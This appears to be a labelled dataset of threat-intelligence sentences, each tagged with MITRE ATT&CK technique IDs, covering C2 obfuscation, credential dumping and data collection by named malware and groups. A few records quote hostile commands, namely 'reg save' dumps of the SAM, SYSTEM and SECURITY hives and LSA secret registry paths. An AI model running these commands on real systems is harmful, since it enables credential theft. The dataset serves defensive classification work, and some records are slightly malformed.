{"text1":"Nefilim removes itself from the target systems after infection with the following code: \"del C:\\Users\\admin\\AppData\\Local\\Temp\\<ransomware_file_name>.exe\" \/s \/f \/q","labels":"['T1070.004']"}
|
|
{"text1":"The Nefilim ransomware queries volume information (disk volume name and serial number) and Cryptographic Machine GUID. Ransomware families use Cryptographic Machine GUID and volume serial number to generate a unique identifier for the host for encryption\/decryption processes. Nefilim obtains Cryptographic Machine GUID by querying the value of MachineGuid in the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography","labels":"['T1082']"}
|
|
{"text1":"Mandiant identified a campaign where the threat actors gained access to the target organization\u2019s Microsoft 365 environment using a stolen session token. Mandiant analyzed the workstations belonging to the end user and discovered that some systems had been infected with CRYPTBOT, an info-stealer malware, shortly before the stolen session token was generated. Mandiant observed that in some cases the user downloaded the malware after browsing to low reputation websites offering free, or \u201ccracked\u201d, software.","labels":"['T1550.004']"}
|
|
{"text1":"When the method R is invoked, InstallUtil.exe is spawned in suspended mode. The memory blocks of the suspended process are unmapped and rewritten with the sections of the payload program passed as an argument to method R. The thread is allowed to continue after changes have been made to the entry point.","labels":"['T1055.012']"}
|
|
{"text1":"To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user.","labels":"['T1588.004']"}
|
|
{"text1":"It can reflectively load a DLL\/EXE into the PowerShell process, or it can reflectively load a DLL into a remote process. These modes have different parameters and constraints; please read the Notes section (GENERAL NOTES) for information on how to use them.","labels":"['T1620']"}
|
|
{"text1":"As the function name says, Invoke-ReflectivePEInjection loads a portable executable (PE) file or DLL into the current or remote process memory and executes this file in memory.","labels":"['T1620']"}
|
|
{"text1":"Invoke-Mimikatz.ps1 is the PowerShell implementation of Mimikatz. The PowerShell script loads Mimikatz.exe reflectively into the process memory.","labels":"['T1620']"}
|
|
{"text1":"Files contained within image files, like mounted ISO files, will not contain the Zone.Identifier Alternate Data Stream (ADS) flag that indicates the files have been downloaded from the internet (so called \u201cmark-of-the-web\u201d) as reported by Didier Stevens.","labels":"['T1553.005']"}
|
|
{"text1":"We believe that the modified library file, which we\u2019ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this","labels":"['T1600']"}
|
|
{"text1":"In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.","labels":"['T1571']"}
|
|
{"text1":"During Operation Wocao, threat actors encrypted IP addresses used for \"Agent\" proxy hops with RC4.","labels":"['T1001']"}
|
|
{"text1":"FlawedAmmyy may obfuscate portions of the initial C2 handshake.","labels":"['T1001']"}
|
|
{"text1":"FunnyDream can send compressed and obfuscated packets to C2.","labels":"['T1001']"}
|
|
{"text1":"Operation Wocao has encrypted IP addresses used for \"Agent\" proxy hops with RC4.","labels":"['T1001']"}
|
|
{"text1":"POWRUNER can use base64 encoded C2 communications.","labels":"['T1001', 'T1132.001']"}
|
|
{"text1":"RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.","labels":"['T1001']"}
|
|
{"text1":"SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests.","labels":"['T1001']"}
|
|
{"text1":"SideTwist can embed C2 responses in the source code of a fake Flickr webpage.","labels":"['T1001']"}
|
|
{"text1":"The Axiom group has used other forms of obfuscation, including commingling legitimate traffic with communications traffic so that network streams appear legitimate.","labels":"['T1001']"}
|
|
{"text1":"TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests.","labels":"['T1001']"}
|
|
{"text1":"Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.","labels":"['T1001.001']"}
|
|
{"text1":"GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection.","labels":"['T1001.001']"}
|
|
{"text1":"GrimAgent can pad C2 messages with random generated values.","labels":"['T1001.001']"}
|
|
{"text1":"Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic.","labels":"['T1001.001']"}
|
|
{"text1":"P2P ZeuS added junk data to outgoing UDP packets to peer implants.","labels":"['T1001.001']"}
|
|
{"text1":"P8RAT can send randomly-generated data as part of its C2 communication.","labels":"['T1001.001']"}
|
|
{"text1":"SUNBURST added junk bytes to its C2 over HTTP.","labels":"['T1001.001']"}
|
|
{"text1":"TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.","labels":"['T1001.001']"}
|
|
{"text1":"Turian can insert pseudo-random characters into its network encryption setup.","labels":"['T1001.001']"}
|
|
{"text1":"WellMess can use junk data in the Base64 string for additional obfuscation.","labels":"['T1001.001']"}
|
|
{"text1":"APT29 has used steganography to hide C2 communications in images.","labels":"['T1001.002']"}
|
|
{"text1":"Axiom has used steganography to hide its C2 communications.","labels":"['T1001.002']"}
|
|
{"text1":"Daserf can use steganography to hide malicious code downloaded to the victim.","labels":"['T1001.002']"}
|
|
{"text1":"HAMMERTOSS is controlled via commands that are appended to image files.","labels":"['T1001.002']"}
|
|
{"text1":"LightNeuron is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.","labels":"['T1001.002']"}
|
|
{"text1":"RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.","labels":"['T1001.002']"}
|
|
{"text1":"Sliver can encode binary data into a .PNG file for C2 communication.","labels":"['T1001.002']"}
|
|
{"text1":"When the Duqu command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.","labels":"['T1001.002']"}
|
|
{"text1":"Zox has used the .PNG file format for C2 communications.","labels":"['T1001.002']"}
|
|
{"text1":"BADCALL uses a FakeTLS method during C2.","labels":"['T1001.003']"}
|
|
{"text1":"Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.","labels":"['T1001.003']"}
|
|
{"text1":"Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.","labels":"['T1001.003']"}
|
|
{"text1":"FALLCHILL uses fake Transport Layer Security (TLS) to communicate with its C2 server.","labels":"['T1001.003']"}
|
|
{"text1":"HARDRAIN uses FakeTLS to communicate with its C2 server.","labels":"['T1001.003']"}
|
|
{"text1":"KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.","labels":"['T1001.003']"}
|
|
{"text1":"Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection\/decryption.","labels":"['T1001.003']"}
|
|
{"text1":"Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.","labels":"['T1001.003']"}
|
|
{"text1":"SUNBURST masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.","labels":"['T1001.003']"}
|
|
{"text1":"TAINTEDSCRIBE has used FakeTLS for session authentication.","labels":"['T1001.003']"}
|
|
{"text1":"APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims.","labels":"['T1003']"}
|
|
{"text1":"APT32 used GetPassword_x64 to harvest credentials.","labels":"['T1003']"}
|
|
{"text1":"APT39 has used different versions of Mimikatz to obtain credentials.","labels":"['T1003']"}
|
|
{"text1":"Carbanak obtains Windows logon password details.","labels":"['T1003']"}
|
|
{"text1":"Dragonfly dropped and executed SecretsDump, a tool that dumps password hashes.","labels":"['T1003']"}
|
|
{"text1":"Frankenstein has harvested credentials from the victim's machine using Empire.","labels":"['T1003']"}
|
|
{"text1":"KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.","labels":"['T1003', 'T1555.003']"}
|
|
{"text1":"Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.","labels":"['T1003']"}
|
|
{"text1":"OnionDuke steals credentials from its victims.","labels":"['T1003']"}
|
|
{"text1":"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).","labels":"['T1003']"}
|
|
{"text1":"Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.","labels":"['T1003']"}
|
|
{"text1":"Revenge RAT has a plugin for credential harvesting.","labels":"['T1003']"}
|
|
{"text1":"Sowbug has used credential dumping tools.","labels":"['T1003']"}
|
|
{"text1":"Suckfly used a signed credential-dumping tool to obtain victim account credentials.","labels":"['T1003']"}
|
|
{"text1":"APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.","labels":"['T1003.001']"}
|
|
{"text1":"APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.","labels":"['T1003.001']"}
|
|
{"text1":"APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.","labels":"['T1003.001']"}
|
|
{"text1":"Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.","labels":"['T1003.001']"}
|
|
{"text1":"BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping.","labels":"['T1003.001']"}
|
|
{"text1":"Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory.","labels":"['T1003.001']"}
|
|
{"text1":"Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor.","labels":"['T1003.001']"}
|
|
{"text1":"Cobalt Strike can spawn a job to inject into LSASS memory and dump password hashes.","labels":"['T1003.001']"}
|
|
{"text1":"CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.","labels":"['T1003.001']"}
|
|
{"text1":"Daserf leverages Mimikatz and Windows Credential Editor to steal credentials.","labels":"['T1003.001']"}
|
|
{"text1":"During Operation Wocao, threat actors used ProcDump to dump credentials from memory.","labels":"['T1003.001']"}
|
|
{"text1":"Earth Lusca has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.","labels":"['T1003.001']"}
|
|
{"text1":"Emotet has been observed dropping password grabber modules including Mimikatz.","labels":"['T1003.001']"}
|
|
{"text1":"FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).","labels":"['T1003.001']"}
|
|
{"text1":"GALLIUM used a modified version of Mimikatz along with a PowerShell-based Mimikatz to dump credentials on the victim machines.","labels":"['T1003.001']"}
|
|
{"text1":"GreyEnergy has a module for Mimikatz to collect Windows credentials from the victim\u2019s machine.","labels":"['T1003.001']"}
|
|
{"text1":"HAFNIUM has used \"procdump\" to dump the LSASS process memory.","labels":"['T1003.001']"}
|
|
{"text1":"Kimsuky has gathered credentials using Mimikatz and ProcDump.","labels":"['T1003.001']"}
|
|
{"text1":"LaZagne can perform credential dumping from memory to obtain account and password information.","labels":"['T1003.001']"}
|
|
{"text1":"Leafminer used several tools for retrieving login and password information, including LaZagne and Mimikatz.","labels":"['T1003.001']"}
|
|
{"text1":"Lizar can run Mimikatz to harvest credentials.","labels":"['T1003.001']"}
|
|
{"text1":"Magic Hound has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using Mimikatz.","labels":"['T1003.001']"}
|
|
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.","labels":"['T1003.001']"}
|
|
{"text1":"OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.","labels":"['T1003.001']"}
|
|
{"text1":"Okrum was seen using MimikatzLite to perform credential dumping.","labels":"['T1003.001']"}
|
|
{"text1":"Operation Wocao has used ProcDump to dump credentials from memory.","labels":"['T1003.001']"}
|
|
{"text1":"PLATINUM has used keyloggers that are also capable of dumping credentials.","labels":"['T1003.001']"}
|
|
{"text1":"PoetRAT used voStro.exe, a compiled pypykatz (Python version of Mimikatz), to steal credentials.","labels":"['T1003.001']"}
|
|
{"text1":"PoshC2 contains an implementation of Mimikatz to gather credentials from memory.","labels":"['T1003.001']"}
|
|
{"text1":"PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz.","labels":"['T1003.001']"}
|
|
{"text1":"Pupy can execute Lazagne as well as Mimikatz using PowerShell.","labels":"['T1003.001']"}
|
|
{"text1":"Pysa can perform OS credential dumping using Mimikatz.","labels":"['T1003.001']"}
|
|
{"text1":"SILENTTRINITY can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.","labels":"['T1003.001']"}
|
|
{"text1":"Sandworm Team's plainpwd tool is a modified version of Mimikatz and dumps Windows credentials from system memory.","labels":"['T1003.001']"}
|
|
{"text1":"SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.","labels":"['T1003.001', 'T1003.002', 'T1003.004']"}
|
|
{"text1":"Silence has used the Farse6.1 utility (based on Mimikatz) to extract credentials from lsass.exe.","labels":"['T1003.001']"}
|
|
{"text1":"Stolen Pencil gathers credentials using Mimikatz and Procdump.","labels":"['T1003.001']"}
|
|
{"text1":"TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials.","labels":"['T1003.001']"}
|
|
{"text1":"Whitefly has used Mimikatz to obtain credentials.","labels":"['T1003.001']"}
|
|
{"text1":"Windows Credential Editor can dump credentials.","labels":"['T1003.001']"}
|
|
{"text1":"Cobalt Strike can recover hashed passwords.","labels":"['T1003.002']"}
|
|
{"text1":"Dragonfly has dropped and executed SecretsDump to dump password hashes.","labels":"['T1003.002', 'T1003.004']"}
|
|
{"text1":"During Night Dragon, threat actors dumped account hashes using gsecdump.","labels":"['T1003.002']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.","labels":"['T1003.002']"}
|
|
{"text1":"Fgdump can dump Windows password hashes.","labels":"['T1003.002']"}
|
|
{"text1":"HOPLIGHT has the capability to harvest credentials and passwords from the SAM database.","labels":"['T1003.002']"}
|
|
{"text1":"Ke3chang has dumped credentials, including by using gsecdump.","labels":"['T1003.002', 'T1003.004']"}
|
|
{"text1":"Koadic can gather hashed passwords by dumping SAM\/SECURITY hive.","labels":"['T1003.002']"}
|
|
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.","labels":"['T1003.002']"}
|
|
{"text1":"Mivast has the capability to gather NTLM password information.","labels":"['T1003.002']"}
|
|
{"text1":"Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel.","labels":"['T1003.002']"}
|
|
{"text1":"POWERTON has the ability to dump password hashes.","labels":"['T1003.002']"}
|
|
{"text1":"Remsec can dump the SAM database.","labels":"['T1003.002']"}
|
|
{"text1":"Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.","labels":"['T1003.002', 'T1003.004']"}
|
|
{"text1":"Wizard Spider has acquired credentials from the SAM\/SECURITY registry hives.","labels":"['T1003.002']"}
|
|
{"text1":"gsecdump can dump Windows password hashes from the SAM.","labels":"['T1003.002']"}
|
|
{"text1":"CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.","labels":"['T1003.003']"}
|
|
{"text1":"HAFNIUM has stolen copies of the Active Directory database (NTDS.DIT).","labels":"['T1003.003']"}
|
|
{"text1":"Ke3chang has used NTDSDump and other password dumping tools to gather credentials.","labels":"['T1003.003']"}
|
|
{"text1":"Koadic can gather hashed passwords by gathering domain controller hashes from NTDS.","labels":"['T1003.003']"}
|
|
{"text1":"LAPSUS$ has used Windows built-in tool `ntdsutil` to extract the Active Directory (AD) database.","labels":"['T1003.003']"}
|
|
{"text1":"Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file.","labels":"['T1003.003']"}
|
|
{"text1":"SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit.","labels":"['T1003.003']"}
|
|
{"text1":"Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.","labels":"['T1003.003']"}
|
|
{"text1":"esentutl can use Volume Shadow Copy to copy locked files such as ntds.dit.","labels":"['T1003.003']"}
|
|
{"text1":"menuPass has used Ntdsutil to dump credentials.","labels":"['T1003.003']"}
|
|
{"text1":"AADInternals can dump secrets from the Local Security Authority.","labels":"['T1003.004']"}
|
|
{"text1":"APT33 has used a variety of publicly available tools like LaZagne to gather credentials.","labels":"['T1003.004', 'T1003.005', 'T1552.001', 'T1555', 'T1555.003']"}
|
|
{"text1":"CosmicDuke collects LSA secrets.","labels":"['T1003.004']"}
|
|
{"text1":"CrackMapExec can dump hashed passwords from LSA secrets for the targeted system.","labels":"['T1003.004']"}
|
|
{"text1":"IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`.","labels":"['T1003.004']"}
|
|
{"text1":"Leafminer used several tools for retrieving login and password information, including LaZagne.","labels":"['T1003.004', 'T1003.005', 'T1552.001', 'T1555', 'T1555.003']"}
|
|
{"text1":"MuddyWater has performed credential dumping with LaZagne.","labels":"['T1003.004', 'T1003.005']"}
|
|
{"text1":"OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.","labels":"['T1003.004', 'T1003.005', 'T1552.001', 'T1555']"}
|
|
{"text1":"Cachedump can extract cached password hashes from cache entry information.","labels":"['T1003.005']"}
|
|
{"text1":"LaZagne can perform credential dumping from MSCache to obtain account and password information.","labels":"['T1003.005']"}
|
|
{"text1":"Okrum was seen using modified Quarks PwDump to perform credential dumping.","labels":"['T1003.005']"}
|
|
{"text1":"APT29 leveraged privileged accounts to replicate directory service data with domain controllers.","labels":"['T1003.006']"}
|
|
{"text1":"Earth Lusca has used a \"DCSync\" command with Mimikatz to retrieve credentials from an exploited controller.","labels":"['T1003.006']"}
|
|
{"text1":"LAPSUS$ has used DCSync attacks to gather credentials for privilege escalation routines.","labels":"['T1003.006']"}
|
|
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync\/NetSync.","labels":"['T1003.006']"}
|
|
{"text1":"Operation Wocao has used Mimikatz's DCSync to dump credentials from the memory of the targeted system.","labels":"['T1003.006']"}
|
|
{"text1":"UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers.","labels":"['T1003.006']"}
|
|
{"text1":"LaZagne can obtain credential information running Linux processes.","labels":"['T1003.007']"}
|
|
{"text1":"MimiPenguin can dump process memory and extract clear-text credentials.","labels":"['T1003.007']"}
|
|
{"text1":"LaZagne can obtain credential information from \/etc\/shadow using the shadow.py module.","labels":"['T1003.008']"}
|
|
{"text1":"APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration.","labels":"['T1005']"}
|
|
{"text1":"APT29 has extracted files from compromised networks.","labels":"['T1005']"}
|
|
{"text1":"APT3 will identify Microsoft Office documents on the victim's computer.","labels":"['T1005']"}
|
|
{"text1":"APT37 has collected data from victims' local systems.","labels":"['T1005']"}
|
|
{"text1":"APT39 has used various tools to steal files from the compromised host.","labels":"['T1005']"}
|
|
{"text1":"Action RAT can collect local data from an infected machine.","labels":"['T1005']"}
|
|
{"text1":"AppleSeed can collect data on a compromised host.","labels":"['T1005']"}
|
|
{"text1":"AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.","labels":"['T1005']"}
|
|
{"text1":"Axiom has collected data from a compromised network.","labels":"['T1005']"}
|
|
{"text1":"BRONZE BUTLER has exfiltrated files stolen from local systems.","labels":"['T1005']"}
|
|
{"text1":"BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.","labels":"['T1005']"}
|
|
{"text1":"Bandook can collect local files from the system.","labels":"['T1005']"}
|
|
{"text1":"Bankshot collects files from the local system.","labels":"['T1005']"}
|
|
{"text1":"Bazar can retrieve information from the infected machine.","labels":"['T1005']"}
|
|
{"text1":"Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies.","labels":"['T1005']"}
|
|
{"text1":"Calisto can collect data from user directories.","labels":"['T1005']"}
|
|
{"text1":"Caterpillar WebShell has a module to collect information from the local database.","labels":"['T1005']"}
|
|
{"text1":"China Chopper's server component can upload local files.","labels":"['T1005']"}
|
|
{"text1":"Chrommme can collect data from a local system.","labels":"['T1005']"}
|
|
{"text1":"Clambling can collect information from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Cobalt Strike can collect data from a local system.","labels":"['T1005']"}
|
|
{"text1":"CookieMiner has retrieved iPhone text messages from iTunes phone backup files.","labels":"['T1005']"}
|
|
{"text1":"CosmicDuke steals user files from local hard drives with file extensions that match a predefined list.","labels":"['T1005']"}
|
|
{"text1":"Crutch can exfiltrate files from compromised systems.","labels":"['T1005']"}
|
|
{"text1":"Cyclops Blink can upload files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"DRATzarus can collect information from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string.","labels":"['T1005']"}
|
|
{"text1":"Dragonfly 2.0 collected data from local victim systems.","labels":"['T1005']"}
|
|
{"text1":"Dtrack can collect a variety of information from victim machines.","labels":"['T1005']"}
|
|
{"text1":"During C0015, the threat actors obtained files and data from the compromised network.","labels":"['T1005']"}
|
|
{"text1":"During Frankenstein, the threat actors used Empire to gather various local system information.","labels":"['T1005']"}
|
|
{"text1":"During Night Dragon, the threat actors collected files and other data from compromised systems.","labels":"['T1005']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors collected data, files, and other information from compromised networks.","labels":"['T1005']"}
|
|
{"text1":"During Operation Honeybee, the threat actors collected data from compromised hosts.","labels":"['T1005']"}
|
|
{"text1":"Dust Storm has used Android backdoors capable of exfiltrating specific files directly from the infected devices.","labels":"['T1005']"}
|
|
{"text1":"FIN7 has collected files and other sensitive information from a compromised network.","labels":"['T1005']"}
|
|
{"text1":"FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system. FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. FLASHFLOOD also collects information stored in the Windows Address Book.","labels":"['T1005']"}
|
|
{"text1":"FlawedAmmyy has collected information and files from a compromised machine.","labels":"['T1005']"}
|
|
{"text1":"Forfiles can be used to act on (ex: copy, move, etc.) files\/directories in a system during (ex: copy files into a staging area before).","labels":"['T1005']"}
|
|
{"text1":"FrameworkPOS can collect elements related to credit card data from process memory.","labels":"['T1005']"}
|
|
{"text1":"Frankenstein has enumerated hosts via Empire, gathering various local system information.","labels":"['T1005']"}
|
|
{"text1":"FunnyDream can upload files from victims' machines.","labels":"['T1005']"}
|
|
{"text1":"Gamaredon Group has collected files from infected systems and uploaded them to a C2 server.","labels":"['T1005']"}
|
|
{"text1":"Goopy has the ability to exfiltrate documents from infected systems.","labels":"['T1005']"}
|
|
{"text1":"GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1005']"}
|
|
{"text1":"Green Lambert can collect data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"GrimAgent can collect data and files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"IceApple can collect files, passwords, and other data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"InvisiMole can collect data from the system, and can monitor changes in specified directories.","labels":"['T1005']"}
|
|
{"text1":"Ixeshe can collect data from a local system.","labels":"['T1005']"}
|
|
{"text1":"KGH_SPY can send a file containing victim system information to C2.","labels":"['T1005']"}
|
|
{"text1":"KONNI has stored collected information and discovered processes in a tmp file.","labels":"['T1005']"}
|
|
{"text1":"Kazuar uploads files from a specified directory to the C2 server.","labels":"['T1005']"}
|
|
{"text1":"Ke3chang gathered information and files from local directories for exfiltration.","labels":"['T1005']"}
|
|
{"text1":"Kevin can upload logs and other data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Koadic can download files off the target system to send back to the server.","labels":"['T1005']"}
|
|
{"text1":"Lazarus Group has collected data and files from compromised networks.","labels":"['T1005']"}
|
|
{"text1":"LightNeuron can collect files from a local system.","labels":"['T1005']"}
|
|
{"text1":"Linfo creates a backdoor through which remote attackers can obtain data from local systems.","labels":"['T1005']"}
|
|
{"text1":"MCMD has the ability to upload files from an infected device.","labels":"['T1005']"}
|
|
{"text1":"MacMa can collect then exfiltrate files from the compromised system.","labels":"['T1005']"}
|
|
{"text1":"Machete searches the File system for files of interest.","labels":"['T1005']"}
|
|
{"text1":"Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.","labels":"['T1005']"}
|
|
{"text1":"Milan can upload files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Misdat has collected files and data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Nebulae has the capability to upload collected files to C2.","labels":"['T1005']"}
|
|
{"text1":"Neoichor can upload files from a victim's machine.","labels":"['T1005']"}
|
|
{"text1":"Operation Wocao has exfiltrated files and directories of interest from the targeted system.","labels":"['T1005']"}
|
|
{"text1":"Out1 can copy files and Registry data from compromised hosts.","labels":"['T1005']"}
|
|
{"text1":"P.A.S. Webshell has the ability to copy files on a compromised host.","labels":"['T1005']"}
|
|
{"text1":"PUNCHTRACK scrapes memory for properly formatted payment card data.","labels":"['T1005']"}
|
|
{"text1":"Patchwork collected and exfiltrated files from the infected system.","labels":"['T1005']"}
|
|
{"text1":"Pillowmint has collected credit card data using native API functions.","labels":"['T1005']"}
|
|
{"text1":"PingPull can collect data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"PoisonIvy creates a backdoor through which remote attackers can steal system information.","labels":"['T1005']"}
|
|
{"text1":"PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.","labels":"['T1005']"}
|
|
{"text1":"PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.","labels":"['T1005']"}
|
|
{"text1":"Proxysvc searches the local system and gathers data.","labels":"['T1005']"}
|
|
{"text1":"QuietSieve can collect files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Ramsay can collect Microsoft Word documents from the target's file system, as well as \".txt\", \".doc\", and \".xls\" files from the Internet Explorer cache.","labels":"['T1005']"}
|
|
{"text1":"RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.","labels":"['T1005']"}
|
|
{"text1":"SDBbot has the ability to access the file system on a compromised host.","labels":"['T1005']"}
|
|
{"text1":"SLOTHFULMEDIA has uploaded files and information from victim machines.","labels":"['T1005']"}
|
|
{"text1":"STARWHALE can collect data from an infected local host.","labels":"['T1005']"}
|
|
{"text1":"SUNBURST collected information from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Saint Bot can collect files and information from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.","labels":"['T1005']"}
|
|
{"text1":"Shark can upload files to its C2.","labels":"['T1005']"}
|
|
{"text1":"ShimRat has the capability to upload collected files to a C2.","labels":"['T1005']"}
|
|
{"text1":"SideTwist has the ability to upload files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"SombRAT has collected data and files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Stealth Falcon malware gathers data from the local victim system.","labels":"['T1005']"}
|
|
{"text1":"StrifeWater can collect data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"Taidoor can upload data and files from a victim's machine.","labels":"['T1005']"}
|
|
{"text1":"TajMahal has the ability to steal documents from the local system including the print spooler queue.","labels":"['T1005']"}
|
|
{"text1":"Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.","labels":"['T1005', 'T1119']"}
|
|
{"text1":"Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration.","labels":"['T1005']"}
|
|
{"text1":"Ursnif has collected files from victim machines, including certificates and cookies.","labels":"['T1005']"}
|
|
{"text1":"WellMail can exfiltrate files from the victim machine.","labels":"['T1005']"}
|
|
{"text1":"WellMess can send files from the victim machine to C2.","labels":"['T1005']"}
|
|
{"text1":"Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors.","labels":"['T1005']"}
|
|
{"text1":"XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.","labels":"['T1005']"}
|
|
{"text1":"Zox has the ability to upload files from a targeted system.","labels":"['T1005']"}
|
|
{"text1":"ZxShell can transfer files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"ZxxZ can collect data from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"ccf32 can collect files from a compromised host.","labels":"['T1005']"}
|
|
{"text1":"creates a backdoor through which remote attackers can steal system information.","labels":"['T1005', 'T1005']"}
|
|
{"text1":"esentutl can be used to collect data from local file systems.","labels":"['T1005']"}
|
|
{"text1":"menuPass has collected various files from the compromised computers.","labels":"['T1005']"}
|
|
{"text1":"njRAT can collect data from a local system.","labels":"['T1005']"}
|
|
{"text1":"xCaon has uploaded files from victims' machines.","labels":"['T1005']"}
|
|
